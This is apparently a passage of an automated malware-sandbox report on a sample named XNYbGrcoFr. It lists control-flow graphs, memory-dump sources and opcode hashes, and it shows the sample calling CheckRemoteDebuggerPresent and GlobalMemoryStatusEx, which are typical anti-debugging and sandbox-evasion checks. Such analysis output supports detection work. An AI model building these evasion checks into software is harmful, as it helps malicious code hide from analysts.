                                                  • Snapshot File: hcaresult_11_2_248d000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e10759914d72b1cf677fb1e6da8d51a86a1d2f385afe8f93d9bf02f4649c3632
                                                  • Instruction ID: 7f66304bfc1d0514a07b1e36b37ca842d6d66134d41ccd58f79e9c63aa0bb703
                                                  • Opcode Fuzzy Hash: e10759914d72b1cf677fb1e6da8d51a86a1d2f385afe8f93d9bf02f4649c3632
                                                  • Instruction Fuzzy Hash: 32F062754057449EE7109E1AD9C8B67FF98EB81674F18C45BED084A286C3799844CBB1

                                                  Execution Graph

                                                  Execution Coverage:13.2%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:22
                                                  Total number of Limit Nodes:5
                                                  execution_graph 27129 1227ec0 27130 1227f04 CheckRemoteDebuggerPresent 27129->27130 27131 1227f46 27130->27131 27132 122099b 27133 122091b 27132->27133 27134 122084e 27132->27134 27134->27133 27136 1221382 27134->27136 27137 1221396 27136->27137 27138 12214a6 27137->27138 27140 1228c80 27137->27140 27138->27134 27141 1228c8a 27140->27141 27142 1228ca4 27141->27142 27145 6cef58f 27141->27145 27150 6cef5a0 27141->27150 27142->27137 27146 6cef5a0 27145->27146 27147 6cef7c6 27146->27147 27148 6cefbe0 GlobalMemoryStatusEx GlobalMemoryStatusEx 27146->27148 27149 6cefbf0 GlobalMemoryStatusEx GlobalMemoryStatusEx 27146->27149 27147->27142 27148->27146 27149->27146 27151 6cef5b5 27150->27151 27152 6cef7c6 27151->27152 27153 6cefbe0 GlobalMemoryStatusEx GlobalMemoryStatusEx 27151->27153 27154 6cefbf0 GlobalMemoryStatusEx GlobalMemoryStatusEx 27151->27154 27152->27142 27153->27151 27154->27151
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.4550444371.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_6ce0000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0a3cbe8e8d6df7e168f9e3846823b8c4b921d6175033fe8ed9abff7bb399a100
                                                  • Instruction ID: f75410ca6e00fe3f1a49db65b3703815e7938b9774b8bac610cc645da4330b2a
                                                  • Opcode Fuzzy Hash: 0a3cbe8e8d6df7e168f9e3846823b8c4b921d6175033fe8ed9abff7bb399a100
                                                  • Instruction Fuzzy Hash: BFD25B30E00255CFDB64DF64C484B9DB7B6FF85310F54896AD40AAB265EB79EE81CB80
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.4550444371.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_6ce0000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6035d61da8c409d964cb57ba62b3fd8d0be831c15dc2cfaab7cd3288f7e3d5dd
                                                  • Instruction ID: cea2ea172d10f8b7f55430abcafe399ba484df1e4311d6fce763a1e879fbbddf
                                                  • Opcode Fuzzy Hash: 6035d61da8c409d964cb57ba62b3fd8d0be831c15dc2cfaab7cd3288f7e3d5dd
                                                  • Instruction Fuzzy Hash: E262BB30F202058FDB54DB69D494AADBBB2FF98314F148969E406EB391DB75ED42CB80
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.4550444371.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_6ce0000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fcff6a88df1df12cb2fea4f3450b57b5e70361c8447090bae373ec32944c1a3d
                                                  • Instruction ID: 1f8c75be6131eae1bd3974ed1f9f0f01070449249c5552954867c4537b73623b
                                                  • Opcode Fuzzy Hash: fcff6a88df1df12cb2fea4f3450b57b5e70361c8447090bae373ec32944c1a3d
                                                  • Instruction Fuzzy Hash: 1D525E30E002098FEF64DBA8D6947BDB7B6FB85310F20852AE405EB355DA75DD81CB91
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.4550444371.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_6ce0000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 89816441f6c6032c590d8a62ef563549bb62899132d5fc9cd505fe3bde6cc80c
                                                  • Instruction ID: f9b711bc567520264ee751872149f525434daa8b03fdc681d5a158c3cc7518c3
                                                  • Opcode Fuzzy Hash: 89816441f6c6032c590d8a62ef563549bb62899132d5fc9cd505fe3bde6cc80c
                                                  • Instruction Fuzzy Hash: 72326E34B102059FDB54DF68D890BAEBBB2FB89310F108529E515EB391DB39ED81CB91
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.4550444371.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_6ce0000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 292e744a5934d5ab42bbb66ea9c417c04ecc722c9b48a39304963bbfde51d034
                                                  • Instruction ID: c6d1af0112c16d2c6b1e5d4c2e2b0ff833ffa1f20fe7a0aa0f232f0b325ef2a1
                                                  • Opcode Fuzzy Hash: 292e744a5934d5ab42bbb66ea9c417c04ecc722c9b48a39304963bbfde51d034
                                                  • Instruction Fuzzy Hash: EE12F331F102159BDB64CFA4D8807AEB7B2FB84314F64843AE856DB345DA76ED42CB90
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.4550444371.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_6ce0000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 98b34fd2c33c2e9ea29d499ed1fcb426973fe4fe1a268c829f0aac42ee43d33c
                                                  • Instruction ID: 158cb74382e14eb0f6dc3826c9be0b0365f1167796ce1e83722b37b916370245
                                                  • Opcode Fuzzy Hash: 98b34fd2c33c2e9ea29d499ed1fcb426973fe4fe1a268c829f0aac42ee43d33c
                                                  • Instruction Fuzzy Hash: C7026F30B002168FDB54DF64E494AAEB7B2FF84310F148969E506AB355DB75ED42CBE0

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 597 1227eb8-1227f44 CheckRemoteDebuggerPresent 599 1227f46-1227f4c 597->599 600 1227f4d-1227f88 597->600 599->600
                                                  APIs
                                                  • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 01227F37
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.4535786761.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_1220000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID: CheckDebuggerPresentRemote
                                                  • String ID:
                                                  • API String ID: 3662101638-0
                                                  • Opcode ID: d7effa786a6ad1b5d3ea09dd3658241267c22cd42f62e9ddc6a986028cf03909
                                                  • Instruction ID: c2c808273ce589fc9b77ff90778e4ac58ff5673f486ca53555a7617f1c468ab9
                                                  • Opcode Fuzzy Hash: d7effa786a6ad1b5d3ea09dd3658241267c22cd42f62e9ddc6a986028cf03909
                                                  • Instruction Fuzzy Hash: C02146B2804259DFCB10CF9AD484BEEBBF4AF48320F14842EE945A3250C778A944CF60

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 603 1227ec0-1227f44 CheckRemoteDebuggerPresent 605 1227f46-1227f4c 603->605 606 1227f4d-1227f88 603->606 605->606
                                                  APIs
                                                  • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 01227F37
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.4535786761.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_1220000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID: CheckDebuggerPresentRemote
                                                  • String ID:
                                                  • API String ID: 3662101638-0
                                                  • Opcode ID: a40f5db156417392439e89e43e96249164ee1bc6ebb3d42caf4c331e7a301e75
                                                  • Instruction ID: f00450f6bd0b0ac53679a4a7ca52cb4ead7aa0c6e16e96ae97cd709652c2075c
                                                  • Opcode Fuzzy Hash: a40f5db156417392439e89e43e96249164ee1bc6ebb3d42caf4c331e7a301e75
                                                  • Instruction Fuzzy Hash: 80215C71804259CFDB00CF9AD444BEEFBF4BF48310F14845AE555A7250D778A944CF60

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 609 122f2f7-122f384 GlobalMemoryStatusEx 613 122f386-122f38c 609->613 614 122f38d-122f3b5 609->614 613->614
                                                  APIs
                                                  • GlobalMemoryStatusEx.KERNELBASE ref: 0122F377
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.4535786761.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_1220000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID: GlobalMemoryStatus
                                                  • String ID:
                                                  • API String ID: 1890195054-0
                                                  • Opcode ID: 18963d9affd8e063e515146c58b89306247cecd97154308fe66bffc7ded15e49
                                                  • Instruction ID: 1ffb71e6d1c292f5463a84ac703e36fa453632d9cc38f47c3dde0dc330b12e71
                                                  • Opcode Fuzzy Hash: 18963d9affd8e063e515146c58b89306247cecd97154308fe66bffc7ded15e49
                                                  • Instruction Fuzzy Hash: 4D2158B1C00659DFCB10CFAAD444BDEFBB4BF48310F10825AE514A7250D778A954CFA1

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 617 122f310-122f384 GlobalMemoryStatusEx 619 122f386-122f38c 617->619 620 122f38d-122f3b5 617->620 619->620
                                                  APIs
                                                  • GlobalMemoryStatusEx.KERNELBASE ref: 0122F377
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.4535786761.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_1220000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID: GlobalMemoryStatus
                                                  • String ID:
                                                  • API String ID: 1890195054-0
                                                  • Opcode ID: 1b5cb7fc1dd542c2717485214173e49e642a4d4aa3e59b08872b461bbeaed554
                                                  • Instruction ID: 58ff7f999ffdd92b407dbe1d2bce075c27d7c4938515185caf86868f82ab8907
                                                  • Opcode Fuzzy Hash: 1b5cb7fc1dd542c2717485214173e49e642a4d4aa3e59b08872b461bbeaed554
                                                  • Instruction Fuzzy Hash: D711E2B1C0065ADBDB10CF9AC544BDEFBF4BF48720F14826AE918A7240D778A954CFA5

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1219 6cefe40-6cefe6e 1232 6cefe71 call 6ceff18 1219->1232 1233 6cefe71 call 6ceff09 1219->1233 1220 6cefe77-6cefe96 1224 6cefe9e-6cefec8 1220->1224 1227 6cefeca-6cefee7 1224->1227 1228 6cefee9 1224->1228 1229 6cefefb-6ceff02 1227->1229 1228->1229 1232->1220 1233->1220
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.4550444371.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_6ce0000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: |
                                                  • API String ID: 0-2343686810
                                                  • Opcode ID: 61af04863537e3f2c810e899e70d9342f800d2520245e7a07fc102cd1ae4f25d
                                                  • Instruction ID: 3becffd8718499a488a4c1d4af7c3d92099e16968529aecdd20e5ec4f96b65fc
                                                  • Opcode Fuzzy Hash: 61af04863537e3f2c810e899e70d9342f800d2520245e7a07fc102cd1ae4f25d
                                                  • Instruction Fuzzy Hash: 85116A75B102149FDB54DF78D8057AEBBF1AF4C600F144469EA1AE73A0EB38A9018B80

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1234 6cefe50-6cefe6e 1235 6cefe77-6cefe96 1234->1235 1247 6cefe71 call 6ceff18 1234->1247 1248 6cefe71 call 6ceff09 1234->1248 1239 6cefe9e-6cefec8 1235->1239 1242 6cefeca-6cefee7 1239->1242 1243 6cefee9 1239->1243 1244 6cefefb-6ceff02 1242->1244 1243->1244 1247->1235 1248->1235
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.4550444371.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_6ce0000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: |
                                                  • API String ID: 0-2343686810
                                                  • Opcode ID: 64ed042f267f5eb046945b2faa02157b21dc0b4d1368c9e26fbcad67797427e4
                                                  • Instruction ID: 1c1d0a666ef3b86fcf2842b063ea57e5e543b9d34c0286b8c39cf0fe80bbb105
                                                  • Opcode Fuzzy Hash: 64ed042f267f5eb046945b2faa02157b21dc0b4d1368c9e26fbcad67797427e4
                                                  • Instruction Fuzzy Hash: 25115B75B002259FDB54DF78D805BAEBBF1AF4C600F10846DE91AE7391EA35AD00CB80

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2104 6ceceb8-6ceced3 2105 6ceced5-6ceced8 2104->2105 2106 6cecede-6cecee1 2105->2106 2107 6ced3a0-6ced3ac 2105->2107 2108 6cecf04-6cecf07 2106->2108 2109 6cecee3-6ceceff 2106->2109 2110 6cecf55-6cecf64 2107->2110 2111 6ced3b2-6ced69f 2107->2111 2114 6cecf09-6cecf4b 2108->2114 2115 6cecf50-6cecf53 2108->2115 2109->2108 2112 6cecf66-6cecf6b 2110->2112 2113 6cecf73-6cecf7f 2110->2113 2316 6ced8c6-6ced8d0 2111->2316 2317 6ced6a5-6ced6ab 2111->2317 2112->2113 2119 6cecf85-6cecf97 2113->2119 2120 6ced8d1-6ced906 2113->2120 2114->2115 2115->2110 2117 6cecf9c-6cecf9f 2115->2117 2122 6cecfe8-6cecfeb 2117->2122 2123 6cecfa1-6cecfe3 2117->2123 2119->2117 2134 6ced908-6ced90b 2120->2134 2126 6cecfed-6ced02f 2122->2126 2127 6ced034-6ced037 2122->2127 2123->2122 2126->2127 2130 6ced039-6ced07b 2127->2130 2131 6ced080-6ced083 2127->2131 2130->2131 2137 6ced0cc-6ced0cf 2131->2137 2138 6ced085-6ced0c7 2131->2138 2139 6ced93e-6ced941 2134->2139 2140 6ced90d-6ced939 2134->2140 2144 6ced118-6ced11b 2137->2144 2145 6ced0d1-6ced113 2137->2145 2138->2137 2141 6ced943 2139->2141 2142 6ced950-6ced953 2139->2142 2140->2139 2363 6ced943 call 6ceda38 2141->2363 2364 6ced943 call 6ceda25 2141->2364 2149 6ced976-6ced978 2142->2149 2150 6ced955-6ced971 2142->2150 2151 6ced11d-6ced11f 2144->2151 2152 6ced12a-6ced12d 2144->2152 2145->2144 2162 6ced97f-6ced982 2149->2162 2163 6ced97a 2149->2163 2150->2149 2158 6ced39d 2151->2158 2159 6ced125 2151->2159 2160 6ced12f-6ced171 2152->2160 2161 6ced176-6ced179 2152->2161 2156 6ced949-6ced94b 2156->2142 2158->2107 2159->2152 2160->2161 2168 6ced17b-6ced18a 2161->2168 2169 6ced1c2-6ced1c5 2161->2169 2162->2134 2171 6ced984-6ced993 2162->2171 2163->2162 2175 6ced18c-6ced191 2168->2175 2176 6ced199-6ced1a5 2168->2176 2179 6ced1c7-6ced1dd 2169->2179 2180 6ced1e2-6ced1e5 2169->2180 2197 6ced9fa-6ceda0f 2171->2197 2198 6ced995-6ced9f8 call 6ce6120 2171->2198 2175->2176 2176->2120 2187 
6ced1ab-6ced1bd 2176->2187 2179->2180 2182 6ced22e-6ced231 2180->2182 2183 6ced1e7-6ced229 2180->2183 2193 6ced23c-6ced23f 2182->2193 2194 6ced233-6ced235 2182->2194 2183->2182 2187->2169 2205 6ced249-6ced24b 2193->2205 2206 6ced241-6ced246 2193->2206 2202 6ced25b-6ced264 2194->2202 2203 6ced237 2194->2203 2198->2197 2216 6ced266-6ced26b 2202->2216 2217 6ced273-6ced27f 2202->2217 2203->2193 2214 6ced24d 2205->2214 2215 6ced252-6ced255 2205->2215 2206->2205 2214->2215 2215->2105 2215->2202 2216->2217 2222 6ced285-6ced299 2217->2222 2223 6ced390-6ced395 2217->2223 2222->2158 2233 6ced29f-6ced2b1 2222->2233 2223->2158 2238 6ced2d5-6ced2d7 2233->2238 2239 6ced2b3-6ced2b9 2233->2239 2245 6ced2e1-6ced2ed 2238->2245 2242 6ced2bd-6ced2c9 2239->2242 2243 6ced2bb 2239->2243 2246 6ced2cb-6ced2d3 2242->2246 2243->2246 2252 6ced2ef-6ced2f9 2245->2252 2253 6ced2fb 2245->2253 2246->2245 2255 6ced300-6ced302 2252->2255 2253->2255 2255->2158 2257 6ced308-6ced324 call 6ce6120 2255->2257 2265 6ced326-6ced32b 2257->2265 2266 6ced333-6ced33f 2257->2266 2265->2266 2266->2223 2268 6ced341-6ced38e 2266->2268 2268->2158 2318 6ced6ad-6ced6b2 2317->2318 2319 6ced6ba-6ced6c3 2317->2319 2318->2319 2319->2120 2320 6ced6c9-6ced6dc 2319->2320 2322 6ced8b6-6ced8c0 2320->2322 2323 6ced6e2-6ced6e8 2320->2323 2322->2316 2322->2317 2324 6ced6ea-6ced6ef 2323->2324 2325 6ced6f7-6ced700 2323->2325 2324->2325 2325->2120 2326 6ced706-6ced727 2325->2326 2329 6ced729-6ced72e 2326->2329 2330 6ced736-6ced73f 2326->2330 2329->2330 2330->2120 2331 6ced745-6ced762 2330->2331 2331->2322 2334 6ced768-6ced76e 2331->2334 2334->2120 2335 6ced774-6ced78d 2334->2335 2337 6ced8a9-6ced8b0 2335->2337 2338 6ced793-6ced7ba 2335->2338 2337->2322 2337->2334 2338->2120 2341 6ced7c0-6ced7ca 2338->2341 2341->2120 2342 6ced7d0-6ced7e7 2341->2342 2344 6ced7e9-6ced7f4 2342->2344 2345 6ced7f6-6ced811 2342->2345 2344->2345 2345->2337 2350 6ced817-6ced830 call 6ce6120 2345->2350 2354 6ced83f-6ced848 2350->2354 2355 6ced832-6ced837 
2350->2355 2354->2120 2356 6ced84e-6ced8a2 2354->2356 2355->2354 2356->2337 2363->2156 2364->2156
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.4550444371.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_6ce0000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c5206ce4b58977f652695ea913a0a81a09db1494c8e2e55d9c9151abca57c725
                                                  • Instruction ID: eee38c65bb169d6ecdf517d70131f509b87531250772b00ca310c3538d32536d
                                                  • Opcode Fuzzy Hash: c5206ce4b58977f652695ea913a0a81a09db1494c8e2e55d9c9151abca57c725
                                                  • Instruction Fuzzy Hash: 6B620D30A012068FDB55DF68D590A9DB7B2FF84304F249A69D006AF355DB79ED86CB80
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.4550444371.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_6ce0000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 51cc56b71355f0b20e1c6538eed4cddf04e8e58642725c87667bed19e3d47a1b
                                                  • Instruction ID: 1c04c023b7bf1bc7a0e2881da7eef338e93c54e2eeea4026d45dbe136e990321
                                                  • Opcode Fuzzy Hash: 51cc56b71355f0b20e1c6538eed4cddf04e8e58642725c87667bed19e3d47a1b
                                                  • Instruction Fuzzy Hash: 6DE15E30F1020A8FDB59DBA9D4906AEBBB2FF85300F20852DE805AB355DB75DD42CB91
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.4550444371.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_6ce0000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8c493139828f9bf46962eaa3c770e6de0af2e6056b875c242f9d8a929ac5a3e5
                                                  • Instruction ID: fa40fc75775349ec226cd940bb94edad5bd0717f94b70afb07309dc881a5734b
                                                  • Opcode Fuzzy Hash: 8c493139828f9bf46962eaa3c770e6de0af2e6056b875c242f9d8a929ac5a3e5
                                                  • Instruction Fuzzy Hash: E5C18E34E202058FDB54DFA9D594AADBBB2EF98310F248429E806EB355DB35ED41CB90
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.4550444371.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_6ce0000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e026b492da1b8eee11886cb59926b16f1cd6a303142e11aeb2d24a080378e30e
                                                  • Instruction ID: c2234dc14e5666c0b1ca04ddda6f2b7020d602a55b0c5336a9dcd5a05a041537
                                                  • Opcode Fuzzy Hash: e026b492da1b8eee11886cb59926b16f1cd6a303142e11aeb2d24a080378e30e
                                                  • Instruction Fuzzy Hash: 8EA1A630F001098BEF64DBACD5947BEBBB6EB89310F204429E505EB396DE39DD818752
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.4550444371.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_6ce0000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: def6b369b2126306e9169931aeb54e0d3d13003c87ff11927714c9fda6065118
                                                  • Instruction ID: d1e0977586adeb2134ed4df8481e682eb14893a0cd54d8ba3787986b7552aaa1
                                                  • Opcode Fuzzy Hash: def6b369b2126306e9169931aeb54e0d3d13003c87ff11927714c9fda6065118
                                                  • Instruction Fuzzy Hash: 36B10A74E1020A8FDFA4CB98D684BADB7B1FB45310F14852AE459EB361DB34ED81CB91
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.4550444371.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_6ce0000_XNYbGrcoFr.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 49dc42bf0516800cc6dd6389807284967db3a0090af0875527cb6fb146e27b8f
• Instruction ID: 2eb16409b9263aafcfc90cd7f342c265a6fbfb44018453e57669e71410bb02e3
• Opcode Fuzzy Hash: 49dc42bf0516800cc6dd6389807284967db3a0090af0875527cb6fb146e27b8f
• Instruction Fuzzy Hash: 54A12930B012568FDB55DF74D850BAEB7B2FF89200F1045A9D40AEB355DE359D82CB91
Memory Dump Source
• Source File: 0000000E.00000002.4550444371.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_6ce0000_XNYbGrcoFr.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a4459be923fc6d79676ad6a04fee52e372664171c693379d93e6f0bf8cc690f7
• Instruction ID: d343a060c30a518a0238610606c87fd95b8a6d94ccd69447f636edcd11537756
• Opcode Fuzzy Hash: a4459be923fc6d79676ad6a04fee52e372664171c693379d93e6f0bf8cc690f7
• Instruction Fuzzy Hash: 14914F34B0125A8FDB55DF68D850BAEB7F2FF89200F108969D80AEB344EF759D418B91
Memory Dump Source
• Source File: 0000000E.00000002.4550444371.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_6ce0000_XNYbGrcoFr.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0bbfe097ac2be33b9ea6ce0d0a738ef683bed18eab5a755b3a351d549c33b023
• Instruction ID: 5a62319073c9de140a426303366b7e2233666ed958ac9ec88c0d5581c68cd817
• Opcode Fuzzy Hash: 0bbfe097ac2be33b9ea6ce0d0a738ef683bed18eab5a755b3a351d549c33b023
• Instruction Fuzzy Hash: 5B61E471F001224BDF559A7EC88465FBAE7EFC4220B55447AE80EDB360DE6AED0287C1
Memory Dump Source
• Source File: 0000000E.00000002.4550444371.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_6ce0000_XNYbGrcoFr.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4a733ee0cbb5066e587087923a5afbc68ef66448140d27a8141f86f3404e0076
• Instruction ID: f3708c5894e8b0a4c3906a004242971110b81489b801b4559f2267e4d77bff25
• Opcode Fuzzy Hash: 4a733ee0cbb5066e587087923a5afbc68ef66448140d27a8141f86f3404e0076
• Instruction Fuzzy Hash: 20814F30B112468BDF54DFA8D4547AEB7F2AF89300F108529E40AEB344EB75ED468B91
Memory Dump Source
• Source File: 0000000E.00000002.4550444371.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_6ce0000_XNYbGrcoFr.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 930aac9c4473918df8f415c81433cf329b39473a09cfb6ada44f8e7fb94b26a4
• Instruction ID: 683613c69e4cc976c4689dfc97b0ab833d7fa50ef2718a59459afe612cae2f0e
• Opcode Fuzzy Hash: 930aac9c4473918df8f415c81433cf329b39473a09cfb6ada44f8e7fb94b26a4
• Instruction Fuzzy Hash: DD814E30B1124A8FDF54DFA9D4547AEB7F2AF89300F108529E40AEB344EB75ED428B91
Memory Dump Source
• Source File: 0000000E.00000002.4550444371.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_6ce0000_XNYbGrcoFr.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0ee2b5b6af0123de3b8f1412ad4c579577dcaa09b71858f1c140765f72d54dd3
• Instruction ID: 343b3ac0271416442e40ce1e389d5bd2eaa83f0e2023445d20515154bb935177
• Opcode Fuzzy Hash: 0ee2b5b6af0123de3b8f1412ad4c579577dcaa09b71858f1c140765f72d54dd3
• Instruction Fuzzy Hash: 79913D30E102198BDF64DF68C890B9DB7B1FF89310F20C699D549AB295DB70AA86CF51
Memory Dump Source
• Source File: 0000000E.00000002.4550444371.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_6ce0000_XNYbGrcoFr.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 11996174f0fc0bf9ec784eaa86c349f30cdfd027624568885f4e7a11cc7dd079
• Instruction ID: 8caf2a599c1679949c3d25df2b88cd33e8484aa5f14acbf1d6b6fe0aafede12e
• Opcode Fuzzy Hash: 11996174f0fc0bf9ec784eaa86c349f30cdfd027624568885f4e7a11cc7dd079
• Instruction Fuzzy Hash: C4912C30E1061A8BDF64DF68C880B9DB7B1FF89310F20C699D549BB245DB70AA85CF91
Memory Dump Source
• Source File: 0000000E.00000002.4550444371.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_6ce0000_XNYbGrcoFr.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 72cab1954b156b4bf4b56c74a6627c3ff2ef9f4ad073149843dbfa63f5f9f4aa
• Instruction ID: b91ae056ed49f9d7b3f8d294af742248a211f89f03d93c60c16bed352b8c440f
• Opcode Fuzzy Hash: 72cab1954b156b4bf4b56c74a6627c3ff2ef9f4ad073149843dbfa63f5f9f4aa
